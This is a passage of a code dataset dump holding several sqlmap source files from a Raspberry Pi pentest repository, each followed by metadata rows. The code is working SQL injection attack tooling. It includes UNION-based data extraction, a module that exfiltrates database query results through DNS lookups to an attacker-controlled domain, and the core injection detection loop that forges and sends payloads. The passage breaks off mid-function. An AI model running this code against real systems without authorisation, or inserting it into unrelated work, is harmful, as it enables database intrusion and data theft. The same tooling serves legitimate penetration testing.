(kb.injection.data[PAYLOAD.TECHNIQUE.UNION].where == PAYLOAD.WHERE.NEGATIVE or \ kb.forcePartialUnion or \ (dump and (conf.limitStart or conf.limitStop)) or "LIMIT " in expression.upper()) and \ " FROM " in expression.upper() and ((Backend.getIdentifiedDbms() \ not in FROM_DUMMY_TABLE) or (Backend.getIdentifiedDbms() in FROM_DUMMY_TABLE \ and not expression.upper().endswith(FROM_DUMMY_TABLE[Backend.getIdentifiedDbms()]))) \ and not re.search(SQL_SCALAR_REGEX, expression, re.I): expression, limitCond, topLimit, startLimit, stopLimit = agent.limitCondition(expression, dump) if limitCond: # Count the number of SQL query entries output countedExpression = expression.replace(expressionFields, queries[Backend.getIdentifiedDbms()].count.query % ('*' if len(expressionFieldsList) > 1 else expressionFields), 1) if " ORDER BY " in countedExpression.upper(): _ = countedExpression.upper().rindex(" ORDER BY ") countedExpression = countedExpression[:_] output = _oneShotUnionUse(countedExpression, unpack) count = unArrayizeValue(parseUnionPage(output)) if isNumPosStrValue(count): if isinstance(stopLimit, int) and stopLimit > 0: stopLimit = min(int(count), int(stopLimit)) else: stopLimit = int(count) infoMsg = "the SQL query used returns " infoMsg += "%d entries" % stopLimit logger.info(infoMsg) elif count and (not isinstance(count, basestring) or not count.isdigit()): warnMsg = "it was not possible to count the number " warnMsg += "of entries for the SQL query provided. " warnMsg += "sqlmap will assume that it returns only " warnMsg += "one entry" logger.warn(warnMsg) stopLimit = 1 elif (not count or int(count) == 0): if not count: warnMsg = "the SQL query provided does not " warnMsg += "return any output" logger.warn(warnMsg) else: value = [] # for empty tables return value threadData = getCurrentThreadData() threadData.shared.limits = iter(xrange(startLimit, stopLimit)) numThreads = min(conf.threads, (stopLimit - startLimit)) threadData.shared.value = BigArray() threadData.shared.buffered = [] threadData.shared.counter = 0 threadData.shared.lastFlushed = startLimit - 1 threadData.shared.showEta = conf.eta and (stopLimit - startLimit) > 1 if threadData.shared.showEta: threadData.shared.progress = ProgressBar(maxValue=(stopLimit - startLimit)) if stopLimit > TURN_OFF_RESUME_INFO_LIMIT: kb.suppressResumeInfo = True debugMsg = "suppressing possible resume console info because of " debugMsg += "large number of rows. It might take too long" logger.debug(debugMsg) try: def unionThread(): threadData = getCurrentThreadData() while kb.threadContinue: with kb.locks.limit: try: valueStart = time.time() threadData.shared.counter += 1 num = threadData.shared.limits.next() except StopIteration: break if Backend.getIdentifiedDbms() in (DBMS.MSSQL, DBMS.SYBASE): field = expressionFieldsList[0] elif Backend.isDbms(DBMS.ORACLE): field = expressionFieldsList else: field = None limitedExpr = agent.limitQuery(num, expression, field) output = _oneShotUnionUse(limitedExpr, unpack, True) if not kb.threadContinue: break if output: with kb.locks.value: if all(map(lambda _: _ in output, (kb.chars.start, kb.chars.stop))): items = parseUnionPage(output) if threadData.shared.showEta: threadData.shared.progress.progress(time.time() - valueStart, threadData.shared.counter) if isListLike(items): # in case that we requested N columns and we get M!=N then we have to filter a bit if len(items) > 1 and len(expressionFieldsList) > 1: items = [item for item in items if isListLike(item) and len(item) == len(expressionFieldsList)] items = [_ for _ in flattenValue(items)] if len(items) > len(expressionFieldsList): filtered = OrderedDict() for item in items: key = re.sub(r"[^A-Za-z0-9]", "", item).lower() if key not in filtered or re.search(r"[^A-Za-z0-9]", item): filtered[key] = item items = filtered.values() items = [items] index = None for index in xrange(len(threadData.shared.buffered)): if threadData.shared.buffered[index][0] >= num: break threadData.shared.buffered.insert(index or 0, (num, items)) else: index = None if threadData.shared.showEta: threadData.shared.progress.progress(time.time() - valueStart, threadData.shared.counter) for index in xrange(len(threadData.shared.buffered)): if threadData.shared.buffered[index][0] >= num: break threadData.shared.buffered.insert(index or 0, (num, None)) items = output.replace(kb.chars.start, "").replace(kb.chars.stop, "").split(kb.chars.delimiter) while threadData.shared.buffered and (threadData.shared.lastFlushed + 1 >= threadData.shared.buffered[0][0] or len(threadData.shared.buffered) > MAX_BUFFERED_PARTIAL_UNION_LENGTH): threadData.shared.lastFlushed, _ = threadData.shared.buffered[0] if not isNoneValue(_): threadData.shared.value.extend(arrayizeValue(_)) del threadData.shared.buffered[0] if conf.verbose == 1 and not (threadData.resumed and kb.suppressResumeInfo) and not threadData.shared.showEta: status = "[%s] [INFO] %s: %s" % (time.strftime("%X"), "resumed" if threadData.resumed else "retrieved", safecharencode(",".join("\"%s\"" % _ for _ in flattenValue(arrayizeValue(items))) if not isinstance(items, basestring) else items)) if len(status) > width: status = "%s..." % status[:width - 3] dataToStdout("%s\n" % status, True) runThreads(numThreads, unionThread) if conf.verbose == 1: clearConsoleLine(True) except KeyboardInterrupt: abortedFlag = True warnMsg = "user aborted during enumeration. sqlmap " warnMsg += "will display partial output" logger.warn(warnMsg) finally: for _ in sorted(threadData.shared.buffered): if not isNoneValue(_[1]): threadData.shared.value.extend(arrayizeValue(_[1])) value = threadData.shared.value kb.suppressResumeInfo = False if not value and not abortedFlag: output = _oneShotUnionUse(expression, unpack) value = parseUnionPage(output) duration = calculateDeltaSeconds(start) if not kb.bruteMode: debugMsg = "performed %d queries in %.2f seconds" % (kb.counters[PAYLOAD.TECHNIQUE.UNION], duration) logger.debug(debugMsg) return value
16,632
Python
.py
290
42.406897
267
0.598919
pwnieexpress/raspberry_pwn
1,024
184
8
GPL-3.0
9/5/2024, 5:12:22 PM (Europe/Amsterdam)
18,969
__init__.py
pwnieexpress_raspberry_pwn/src/pentest/sqlmap/lib/techniques/union/__init__.py
#!/usr/bin/env python """ Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ pass
150
Python
.py
6
23.666667
62
0.746479
pwnieexpress/raspberry_pwn
1,024
184
8
GPL-3.0
9/5/2024, 5:12:22 PM (Europe/Amsterdam)
18,970
test.py
pwnieexpress_raspberry_pwn/src/pentest/sqlmap/lib/techniques/dns/test.py
#!/usr/bin/env python """ Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ from lib.core.common import Backend from lib.core.common import randomInt from lib.core.data import conf from lib.core.data import kb from lib.core.data import logger from lib.core.dicts import FROM_DUMMY_TABLE from lib.core.exception import SqlmapNotVulnerableException from lib.techniques.dns.use import dnsUse def dnsTest(payload): logger.info("testing for data retrieval through DNS channel") randInt = randomInt() kb.dnsTest = dnsUse(payload, "SELECT %d%s" % (randInt, FROM_DUMMY_TABLE.get(Backend.getIdentifiedDbms(), ""))) == str(randInt) if not kb.dnsTest: errMsg = "data retrieval through DNS channel failed" if not conf.forceDns: conf.dnsName = None errMsg += ". Turning off DNS exfiltration support" logger.error(errMsg) else: raise SqlmapNotVulnerableException(errMsg) else: infoMsg = "data retrieval through DNS channel was successful" logger.info(infoMsg)
1,127
Python
.py
28
35.178571
130
0.724611
pwnieexpress/raspberry_pwn
1,024
184
8
GPL-3.0
9/5/2024, 5:12:22 PM (Europe/Amsterdam)
18,971
use.py
pwnieexpress_raspberry_pwn/src/pentest/sqlmap/lib/techniques/dns/use.py
#!/usr/bin/env python """ Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ import re import time from extra.safe2bin.safe2bin import safecharencode from lib.core.agent import agent from lib.core.common import Backend from lib.core.common import calculateDeltaSeconds from lib.core.common import dataToStdout from lib.core.common import decodeHexValue from lib.core.common import extractRegexResult from lib.core.common import getSQLSnippet from lib.core.common import hashDBRetrieve from lib.core.common import hashDBWrite from lib.core.common import randomInt from lib.core.common import randomStr from lib.core.common import safeStringFormat from lib.core.common import singleTimeWarnMessage from lib.core.data import conf from lib.core.data import kb from lib.core.data import logger from lib.core.data import queries from lib.core.enums import DBMS from lib.core.settings import DNS_BOUNDARIES_ALPHABET from lib.core.settings import MAX_DNS_LABEL from lib.core.settings import PARTIAL_VALUE_MARKER from lib.core.unescaper import unescaper from lib.request.connect import Connect as Request def dnsUse(payload, expression): """ Retrieve the output of a SQL query taking advantage of the DNS resolution mechanism by making request back to attacker's machine. """ start = time.time() retVal = None count = 0 offset = 1 if conf.dnsName and Backend.getIdentifiedDbms() in (DBMS.MSSQL, DBMS.ORACLE, DBMS.MYSQL, DBMS.PGSQL): output = hashDBRetrieve(expression, checkConf=True) if output and PARTIAL_VALUE_MARKER in output or kb.dnsTest is None: output = None if output is None: kb.dnsMode = True while True: count += 1 prefix, suffix = ("%s" % randomStr(length=3, alphabet=DNS_BOUNDARIES_ALPHABET) for _ in xrange(2)) chunk_length = MAX_DNS_LABEL / 2 if Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.MYSQL, DBMS.PGSQL) else MAX_DNS_LABEL / 4 - 2 _, _, _, _, _, _, fieldToCastStr, _ = agent.getFields(expression) nulledCastedField = agent.nullAndCastField(fieldToCastStr) nulledCastedField = queries[Backend.getIdentifiedDbms()].substring.query % (nulledCastedField, offset, chunk_length) nulledCastedField = agent.hexConvertField(nulledCastedField) expressionReplaced = expression.replace(fieldToCastStr, nulledCastedField, 1) expressionRequest = getSQLSnippet(Backend.getIdentifiedDbms(), "dns_request", PREFIX=prefix, QUERY=expressionReplaced, SUFFIX=suffix, DOMAIN=conf.dnsName) expressionUnescaped = unescaper.escape(expressionRequest) if Backend.getIdentifiedDbms() in (DBMS.MSSQL, DBMS.PGSQL): query = agent.prefixQuery("; %s" % expressionUnescaped) query = "%s%s" % (query, queries[Backend.getIdentifiedDbms()].comment.query) forgedPayload = agent.payload(newValue=query) else: forgedPayload = safeStringFormat(payload, (expressionUnescaped, randomInt(1), randomInt(3))) Request.queryPage(forgedPayload, content=False, noteResponseTime=False, raise404=False) _ = conf.dnsServer.pop(prefix, suffix) if _: _ = extractRegexResult("%s\.(?P<result>.+)\.%s" % (prefix, suffix), _, re.I) _ = decodeHexValue(_) output = (output or "") + _ offset += len(_) if len(_) < chunk_length: break else: break output = decodeHexValue(output) if conf.hexConvert else output kb.dnsMode = False if output is not None: retVal = output if kb.dnsTest is not None: dataToStdout("[%s] [INFO] %s: %s\n" % (time.strftime("%X"), "retrieved" if count > 0 else "resumed", safecharencode(output))) if count > 0: hashDBWrite(expression, output) if not kb.bruteMode: debugMsg = "performed %d queries in %.2f seconds" % (count, calculateDeltaSeconds(start)) logger.debug(debugMsg) elif conf.dnsName: warnMsg = "DNS data exfiltration method through SQL injection " warnMsg += "is currently not available for DBMS %s" % Backend.getIdentifiedDbms() singleTimeWarnMessage(warnMsg) return safecharencode(retVal) if kb.safeCharEncode else retVal
4,654
Python
.py
90
42.122222
170
0.667548
pwnieexpress/raspberry_pwn
1,024
184
8
GPL-3.0
9/5/2024, 5:12:22 PM (Europe/Amsterdam)
18,972
__init__.py
pwnieexpress_raspberry_pwn/src/pentest/sqlmap/lib/techniques/dns/__init__.py
#!/usr/bin/env python """ Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ pass
150
Python
.py
6
23.666667
62
0.746479
pwnieexpress/raspberry_pwn
1,024
184
8
GPL-3.0
9/5/2024, 5:12:22 PM (Europe/Amsterdam)
18,973
checks.py
pwnieexpress_raspberry_pwn/src/pentest/sqlmap/lib/controller/checks.py
#!/usr/bin/env python """ Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ import copy import httplib import re import socket import time from subprocess import Popen as execute from extra.beep.beep import beep from lib.core.agent import agent from lib.core.common import arrayizeValue from lib.core.common import Backend from lib.core.common import extractRegexResult from lib.core.common import extractTextTagContent from lib.core.common import findDynamicContent from lib.core.common import Format from lib.core.common import getLastRequestHTTPError from lib.core.common import getPublicTypeMembers from lib.core.common import getSortedInjectionTests from lib.core.common import getUnicode from lib.core.common import intersect from lib.core.common import listToStrValue from lib.core.common import parseFilePaths from lib.core.common import popValue from lib.core.common import pushValue from lib.core.common import randomInt from lib.core.common import randomStr from lib.core.common import readInput from lib.core.common import showStaticWords from lib.core.common import singleTimeLogMessage from lib.core.common import singleTimeWarnMessage from lib.core.common import urlencode from lib.core.common import wasLastResponseDBMSError from lib.core.common import wasLastResponseHTTPError from lib.core.data import conf from lib.core.data import kb from lib.core.data import logger from lib.core.datatype import AttribDict from lib.core.datatype import InjectionDict from lib.core.decorators import cachedmethod from lib.core.dicts import FROM_DUMMY_TABLE from lib.core.enums import CUSTOM_LOGGING from lib.core.enums import DBMS from lib.core.enums import HEURISTIC_TEST from lib.core.enums import HTTP_HEADER from lib.core.enums import HTTPMETHOD from lib.core.enums import NULLCONNECTION from lib.core.enums import PAYLOAD from lib.core.enums import PLACE from lib.core.exception import SqlmapConnectionException from lib.core.exception import SqlmapNoneDataException from lib.core.exception import SqlmapSilentQuitException from lib.core.exception import SqlmapUserQuitException from lib.core.settings import DUMMY_XSS_CHECK_APPENDIX from lib.core.settings import FORMAT_EXCEPTION_STRINGS from lib.core.settings import HEURISTIC_CHECK_ALPHABET from lib.core.settings import SUHOSIN_MAX_VALUE_LENGTH from lib.core.settings import UNKNOWN_DBMS from lib.core.settings import URI_HTTP_HEADER from lib.core.settings import LOWER_RATIO_BOUND from lib.core.settings import UPPER_RATIO_BOUND from lib.core.settings import IDS_WAF_CHECK_PAYLOAD from lib.core.threads import getCurrentThreadData from lib.request.connect import Connect as Request from lib.request.inject import checkBooleanExpression from lib.request.templates import getPageTemplate from lib.techniques.union.test import unionTest from lib.techniques.union.use import configUnion def checkSqlInjection(place, parameter, value): # Store here the details about boundaries and payload used to # successfully inject injection = InjectionDict() # Localized thread data needed for some methods threadData = getCurrentThreadData() # Set the flag for SQL injection test mode kb.testMode = True tests = getSortedInjectionTests() while tests: test = tests.pop(0) try: if kb.endDetection: break if conf.dbms is None: if not injection.dbms and PAYLOAD.TECHNIQUE.BOOLEAN in injection.data: if not Backend.getIdentifiedDbms() and not kb.heuristicDbms: kb.heuristicDbms = heuristicCheckDbms(injection) or UNKNOWN_DBMS if not conf.testFilter and (Backend.getErrorParsedDBMSes() or kb.heuristicDbms) not in ([], None, UNKNOWN_DBMS): if kb.reduceTests is None and Backend.getErrorParsedDBMSes(): msg = "heuristic (parsing) test showed that the " msg += "back-end DBMS could be '%s'. " % (Format.getErrorParsedDBMSes() if Backend.getErrorParsedDBMSes() else kb.heuristicDbms) msg += "Do you want to skip test payloads specific for other DBMSes? [Y/n]" kb.reduceTests = [] if readInput(msg, default='Y').upper() != 'Y' else (Backend.getErrorParsedDBMSes() or [kb.heuristicDbms]) if kb.extendTests is None: _ = (Format.getErrorParsedDBMSes() if Backend.getErrorParsedDBMSes() else kb.heuristicDbms) msg = "do you want to include all tests for '%s' " % _ msg += "extending provided level (%d) and risk (%s) values? [Y/n]" % (conf.level, conf.risk) kb.extendTests = [] if readInput(msg, default='Y').upper() != 'Y' else (Backend.getErrorParsedDBMSes() or [kb.heuristicDbms]) elif kb.extendTests is None and conf.level < 5 and conf.risk < 3: msg = "do you want to include all tests for '%s' " % conf.dbms msg += "extending provided level (%d) and risk (%s)? [Y/n]" % (conf.level, conf.risk) kb.extendTests = [] if readInput(msg, default='Y').upper() != 'Y' else ([conf.dbms]) title = test.title kb.testType = stype = test.stype clause = test.clause unionExtended = False if stype == PAYLOAD.TECHNIQUE.UNION: configUnion(test.request.char) if "[CHAR]" in title: if conf.uChar is None: continue else: title = title.replace("[CHAR]", conf.uChar) elif "[RANDNUM]" in title or "(NULL)" in title: title = title.replace("[RANDNUM]", "random number") if test.request.columns == "[COLSTART]-[COLSTOP]": if conf.uCols is None: continue else: title = title.replace("[COLSTART]", str(conf.uColsStart)) title = title.replace("[COLSTOP]", str(conf.uColsStop)) elif conf.uCols is not None: debugMsg = "skipping test '%s' because the user " % title debugMsg += "provided custom column range %s" % conf.uCols logger.debug(debugMsg) continue match = re.search(r"(\d+)-(\d+)", test.request.columns) if injection.data and match: lower, upper = int(match.group(1)), int(match.group(2)) for _ in (lower, upper): if _ > 1: unionExtended = True test.request.columns = re.sub(r"\b%d\b" % _, str(2 * _), test.request.columns) title = re.sub(r"\b%d\b" % _, str(2 * _), title) test.title = re.sub(r"\b%d\b" % _, str(2 * _), test.title) # Skip test if the user's wants to test only for a specific # technique if conf.tech and isinstance(conf.tech, list) and stype not in conf.tech: debugMsg = "skipping test '%s' because the user " % title debugMsg += "specified to test only for " debugMsg += "%s techniques" % " & ".join(map(lambda x: PAYLOAD.SQLINJECTION[x], conf.tech)) logger.debug(debugMsg) continue # Skip test if it is the same SQL injection type already # identified by another test if injection.data and stype in injection.data: debugMsg = "skipping test '%s' because " % title debugMsg += "the payload for %s has " % PAYLOAD.SQLINJECTION[stype] debugMsg += "already been identified" logger.debug(debugMsg) continue # Skip DBMS-specific test if it does not match either the # previously identified or the user's provided DBMS (either # from program switch or from parsed error message(s)) if "details" in test and "dbms" in test.details: dbms = test.details.dbms else: dbms = None # Skip tests if title is not included by the given filter if conf.testFilter: if not any(conf.testFilter in str(item) or re.search(conf.testFilter, str(item), re.I) for item in (test.title, test.vector, dbms)): debugMsg = "skipping test '%s' because " % title debugMsg += "its name/vector/dbms is not included by the given filter" logger.debug(debugMsg) continue elif not (kb.extendTests and intersect(dbms, kb.extendTests)): # Skip test if the risk is higher than the provided (or default) # value # Parse test's <risk> if test.risk > conf.risk: debugMsg = "skipping test '%s' because the risk (%d) " % (title, test.risk) debugMsg += "is higher than the provided (%d)" % conf.risk logger.debug(debugMsg) continue # Skip test if the level is higher than the provided (or default) # value # Parse test's <level> if test.level > conf.level: debugMsg = "skipping test '%s' because the level (%d) " % (title, test.level) debugMsg += "is higher than the provided (%d)" % conf.level logger.debug(debugMsg) continue if dbms is not None: if injection.dbms is not None and not intersect(injection.dbms, dbms): debugMsg = "skipping test '%s' because " % title debugMsg += "the back-end DBMS identified is " debugMsg += "%s" % injection.dbms logger.debug(debugMsg) continue if conf.dbms is not None and not intersect(conf.dbms.lower(), [_.lower() for _ in arrayizeValue(dbms)]): debugMsg = "skipping test '%s' because " % title debugMsg += "the provided DBMS is %s" % conf.dbms logger.debug(debugMsg) continue if kb.reduceTests and not intersect(dbms, kb.reduceTests): debugMsg = "skipping test '%s' because " % title debugMsg += "the parsed error message(s) showed " debugMsg += "that the back-end DBMS could be " debugMsg += "%s" % Format.getErrorParsedDBMSes() logger.debug(debugMsg) continue # Skip test if it does not match the same SQL injection clause # already identified by another test clauseMatch = False for clauseTest in clause: if injection.clause is not None and clauseTest in injection.clause: clauseMatch = True break if clause != [0] and injection.clause and injection.clause != [0] and not clauseMatch: debugMsg = "skipping test '%s' because the clauses " % title debugMsg += "differs from the clause already identified" logger.debug(debugMsg) continue # Skip test if the user provided custom character if conf.uChar is not None and ("random number" in title or "(NULL)" in title): debugMsg = "skipping test '%s' because the user " % title debugMsg += "provided a specific character, %s" % conf.uChar logger.debug(debugMsg) continue infoMsg = "testing '%s'" % title logger.info(infoMsg) # Force back-end DBMS according to the current # test value for proper payload unescaping Backend.forceDbms(dbms[0] if isinstance(dbms, list) else dbms) # Parse test's <request> comment = agent.getComment(test.request) if len(conf.boundaries) > 1 else None fstPayload = agent.cleanupPayload(test.request.payload, origValue=value if place not in (PLACE.URI, PLACE.CUSTOM_POST, PLACE.CUSTOM_HEADER) else None) # Favoring non-string specific boundaries in case of digit-like parameter values if value.isdigit(): boundaries = sorted(copy.deepcopy(conf.boundaries), key=lambda x: any(_ in (x.prefix or "") or _ in (x.suffix or "") for _ in ('"', '\''))) else: boundaries = conf.boundaries for boundary in boundaries: injectable = False # Skip boundary if the level is higher than the provided (or # default) value # Parse boundary's <level> if boundary.level > conf.level: continue # Skip boundary if it does not match against test's <clause> # Parse test's <clause> and boundary's <clause> clauseMatch = False for clauseTest in test.clause: if clauseTest in boundary.clause: clauseMatch = True break if test.clause != [0] and boundary.clause != [0] and not clauseMatch: continue # Skip boundary if it does not match against test's <where> # Parse test's <where> and boundary's <where> whereMatch = False for where in test.where: if where in boundary.where: whereMatch = True break if not whereMatch: continue # Parse boundary's <prefix>, <suffix> and <ptype> prefix = boundary.prefix if boundary.prefix else "" suffix = boundary.suffix if boundary.suffix else "" # Options --prefix/--suffix have a higher priority (if set by user) prefix = conf.prefix if conf.prefix is not None else prefix suffix = conf.suffix if conf.suffix is not None else suffix comment = None if conf.suffix is not None else comment ptype = boundary.ptype # If the previous injections succeeded, we know which prefix, # suffix and parameter type to use for further tests, no # need to cycle through the boundaries for the following tests condBound = (injection.prefix is not None and injection.suffix is not None) condBound &= (injection.prefix != prefix or injection.suffix != suffix) condType = injection.ptype is not None and injection.ptype != ptype if condBound or condType: continue # For each test's <where> for where in test.where: templatePayload = None vector = None # Threat the parameter original value according to the # test's <where> tag if where == PAYLOAD.WHERE.ORIGINAL or conf.prefix: origValue = value if kb.tamperFunctions: templatePayload = agent.payload(place, parameter, value="", newValue=origValue, where=where) elif where == PAYLOAD.WHERE.NEGATIVE: # Use different page template than the original # one as we are changing parameters value, which # will likely result in a different content kb.data.setdefault("randomInt", str(randomInt(10))) kb.data.setdefault("randomStr", str(randomStr(10))) if conf.invalidLogical: _ = int(kb.data.randomInt[:2]) origValue = "%s AND %s=%s" % (value, _, _ + 1) elif conf.invalidBignum: origValue = kb.data.randomInt[:6] elif conf.invalidString: origValue = kb.data.randomStr[:6] else: origValue = "-%s" % kb.data.randomInt[:4] templatePayload = agent.payload(place, parameter, value="", newValue=origValue, where=where) elif where == PAYLOAD.WHERE.REPLACE: origValue = "" kb.pageTemplate, kb.errorIsNone = getPageTemplate(templatePayload, place) # Forge request payload by prepending with boundary's # prefix and appending the boundary's suffix to the # test's ' <payload><comment> ' string boundPayload = agent.prefixQuery(fstPayload, prefix, where, clause) boundPayload = agent.suffixQuery(boundPayload, comment, suffix, where) reqPayload = agent.payload(place, parameter, newValue=boundPayload, where=where) # Perform the test's request and check whether or not the # payload was successful # Parse test's <response> for method, check in test.response.items(): check = agent.cleanupPayload(check, origValue=value if place not in (PLACE.URI, PLACE.CUSTOM_POST, PLACE.CUSTOM_HEADER) else None) # In case of boolean-based blind SQL injection if method == PAYLOAD.METHOD.COMPARISON: # Generate payload used for comparison def genCmpPayload(): sndPayload = agent.cleanupPayload(test.response.comparison, origValue=value if place not in (PLACE.URI, PLACE.CUSTOM_POST, PLACE.CUSTOM_HEADER) else None) # Forge response payload by prepending with # boundary's prefix and appending the boundary's # suffix to the test's ' <payload><comment> ' # string boundPayload = agent.prefixQuery(sndPayload, prefix, where, clause) boundPayload = agent.suffixQuery(boundPayload, comment, suffix, where) cmpPayload = agent.payload(place, parameter, newValue=boundPayload, where=where) return cmpPayload # Useful to set kb.matchRatio at first based on # the False response content kb.matchRatio = None kb.negativeLogic = (where == PAYLOAD.WHERE.NEGATIVE) Request.queryPage(genCmpPayload(), place, raise404=False) falsePage = threadData.lastComparisonPage or "" # Perform the test's True request trueResult = Request.queryPage(reqPayload, place, raise404=False) truePage = threadData.lastComparisonPage or "" if trueResult: falseResult = Request.queryPage(genCmpPayload(), place, raise404=False) # Perform the test's False request if not falseResult: infoMsg = "%s parameter '%s' seems to be '%s' injectable " % (place, parameter, title) logger.info(infoMsg) injectable = True if not injectable and not any((conf.string, conf.notString, conf.regexp)) and kb.pageStable: trueSet = set(extractTextTagContent(truePage)) falseSet = set(extractTextTagContent(falsePage)) candidates = filter(None, (_.strip() if _.strip() in (kb.pageTemplate or "") and _.strip() not in falsePage and _.strip() not in threadData.lastComparisonHeaders else None for _ in (trueSet - falseSet))) if candidates: conf.string = candidates[0] infoMsg = "%s parameter '%s' seems to be '%s' injectable (with --string=\"%s\")" % (place, parameter, title, repr(conf.string).lstrip('u').strip("'")) logger.info(infoMsg) injectable = True # In case of error-based SQL injection elif method == PAYLOAD.METHOD.GREP: # Perform the test's request and grep the response # body for the test's <grep> regular expression try: page, headers = Request.queryPage(reqPayload, place, content=True, raise404=False) output = extractRegexResult(check, page, re.DOTALL | re.IGNORECASE) \ or extractRegexResult(check, listToStrValue( \ [headers[key] for key in headers.keys() if key.lower() != URI_HTTP_HEADER.lower()] \ if headers else None), re.DOTALL | re.IGNORECASE) \ or extractRegexResult(check, threadData.lastRedirectMsg[1] \ if threadData.lastRedirectMsg and threadData.lastRedirectMsg[0] == \ threadData.lastRequestUID else None, re.DOTALL | re.IGNORECASE) if output: result = output == "1" if result: infoMsg = "%s parameter '%s' is '%s' injectable " % (place, parameter, title) logger.info(infoMsg) injectable = True except SqlmapConnectionException, msg: debugMsg = "problem occurred most likely because the " debugMsg += "server hasn't recovered as expected from the " debugMsg += "error-based payload used ('%s')" % msg logger.debug(debugMsg) # In case of time-based blind or stacked queries # SQL injections elif method == PAYLOAD.METHOD.TIME: # Perform the test's request trueResult = Request.queryPage(reqPayload, place, timeBasedCompare=True, raise404=False) if trueResult: # Confirm test's results trueResult = Request.queryPage(reqPayload, place, timeBasedCompare=True, raise404=False) if trueResult: infoMsg = "%s parameter '%s' seems to be '%s' injectable " % (place, parameter, title) logger.info(infoMsg) injectable = True # In case of UNION query SQL injection elif method == PAYLOAD.METHOD.UNION: # Test for UNION injection and set the sample # payload as well as the vector. # NOTE: vector is set to a tuple with 6 elements, # used afterwards by Agent.forgeUnionQuery() # method to forge the UNION query payload configUnion(test.request.char, test.request.columns) if not Backend.getIdentifiedDbms(): if kb.heuristicDbms in (None, UNKNOWN_DBMS): warnMsg = "using unescaped version of the test " warnMsg += "because of zero knowledge of the " warnMsg += "back-end DBMS. You can try to " warnMsg += "explicitly set it using option '--dbms'" singleTimeWarnMessage(warnMsg) else: Backend.forceDbms(kb.heuristicDbms) if unionExtended: infoMsg = "automatically extending ranges " infoMsg += "for UNION query injection technique tests as " infoMsg += "there is at least one other (potential) " infoMsg += "technique found" singleTimeLogMessage(infoMsg) # Test for UNION query SQL injection reqPayload, vector = unionTest(comment, place, parameter, value, prefix, suffix) if isinstance(reqPayload, basestring): infoMsg = "%s parameter '%s' is '%s' injectable" % (place, parameter, title) logger.info(infoMsg) injectable = True # Overwrite 'where' because it can be set # by unionTest() directly where = vector[6] kb.previousMethod = method if conf.dummy: injectable = False # If the injection test was successful feed the injection # object with the test's details if injectable is True: # Feed with the boundaries details only the first time a # test has been successful if injection.place is None or injection.parameter is None: if place in (PLACE.USER_AGENT, PLACE.REFERER, PLACE.HOST): injection.parameter = place else: injection.parameter = parameter injection.place = place injection.ptype = ptype injection.prefix = prefix injection.suffix = suffix injection.clause = clause # Feed with test details every time a test is successful if hasattr(test, "details"): for dKey, dValue in test.details.items(): if dKey == "dbms": injection.dbms = dValue if not isinstance(dValue, list): Backend.setDbms(dValue) else: Backend.forceDbms(dValue[0], True) elif dKey == "dbms_version" and injection.dbms_version is None and not conf.testFilter: injection.dbms_version = Backend.setVersion(dValue) elif dKey == "os" and injection.os is None: injection.os = Backend.setOs(dValue) if vector is None and "vector" in test and test.vector is not None: vector = test.vector injection.data[stype] = AttribDict() injection.data[stype].title = title injection.data[stype].payload = agent.removePayloadDelimiters(reqPayload) injection.data[stype].where = where injection.data[stype].vector = vector injection.data[stype].comment = comment injection.data[stype].templatePayload = templatePayload injection.data[stype].matchRatio = kb.matchRatio injection.conf.textOnly = conf.textOnly injection.conf.titles = conf.titles injection.conf.string = conf.string injection.conf.notString = conf.notString injection.conf.regexp = conf.regexp injection.conf.optimize = conf.optimize if not kb.alerted: if conf.beep: beep() if conf.alert: infoMsg = "executing alerting shell command(s) ('%s')" % conf.alert logger.info(infoMsg) process = execute(conf.alert, shell=True) process.wait() kb.alerted = True # There is no need to perform this test for other # <where> tags break if injectable is True: kb.vulnHosts.add(conf.hostname) break # Reset forced back-end DBMS value Backend.flushForcedDbms() except KeyboardInterrupt: warnMsg = "user aborted during detection phase" logger.warn(warnMsg) msg = "how do you want to proceed? [(S)kip current test/(e)nd detection phase/(n)ext parameter/(c)hange verbosity/(q)uit]" choice = readInput(msg, default="S", checkBatch=False) if choice[0] in ("s", "S"): pass elif choice[0] in ("c", "C"): choice = None while not ((choice or "").isdigit() and 0 <= int(choice) <= 6): if choice: logger.warn("invalid value") msg = "enter new verbosity level: [0-6] " choice = readInput(msg, default=str(conf.verbose), checkBatch=False).strip() conf.verbose = int(choice) setVerbosity() tests.insert(0, test) elif choice[0] in ("n", "N"): return None elif choice[0] in ("e", "E"): kb.endDetection = True elif choice[0] in ("q", "Q"): raise SqlmapUserQuitException finally: # Reset forced back-end DBMS value Backend.flushForcedDbms() Backend.flushForcedDbms(True) # Return the injection object if injection.place is not None and injection.parameter is not None: if not conf.dropSetCookie and PAYLOAD.TECHNIQUE.BOOLEAN in injection.data and injection.data[PAYLOAD.TECHNIQUE.BOOLEAN].vector.startswith('OR'): warnMsg = "in OR boolean-based injections, please consider usage " warnMsg += "of switch '--drop-set-cookie' if you experience any " warnMsg += "problems during data retrieval" logger.warn(warnMsg) injection = checkFalsePositives(injection) if not injection: kb.vulnHosts.remove(conf.hostname) else: injection = None if injection: checkSuhosinPatch(injection) checkFilteredChars(injection) return injection def heuristicCheckDbms(injection): retVal = None pushValue(kb.injection) kb.injection = injection randStr1, randStr2 = randomStr(), randomStr() for dbms in getPublicTypeMembers(DBMS, True): Backend.forceDbms(dbms) if checkBooleanExpression("(SELECT '%s'%s)='%s'" % (randStr1, FROM_DUMMY_TABLE.get(dbms, ""), randStr1)): if not checkBooleanExpression("(SELECT '%s'%s)='%s'" % (randStr1, FROM_DUMMY_TABLE.get(dbms, ""), randStr2)): retVal = dbms break Backend.flushForcedDbms() kb.injection = popValue() if retVal: infoMsg = "heuristic (extended) test shows that the back-end DBMS " # not as important as "parsing" counter-part (because of false-positives) infoMsg += "could be '%s' " % retVal logger.info(infoMsg) return retVal def checkFalsePositives(injection): """ Checks for false positives (only in single special cases) """ retVal = injection if all(_ in (PAYLOAD.TECHNIQUE.BOOLEAN, PAYLOAD.TECHNIQUE.TIME, 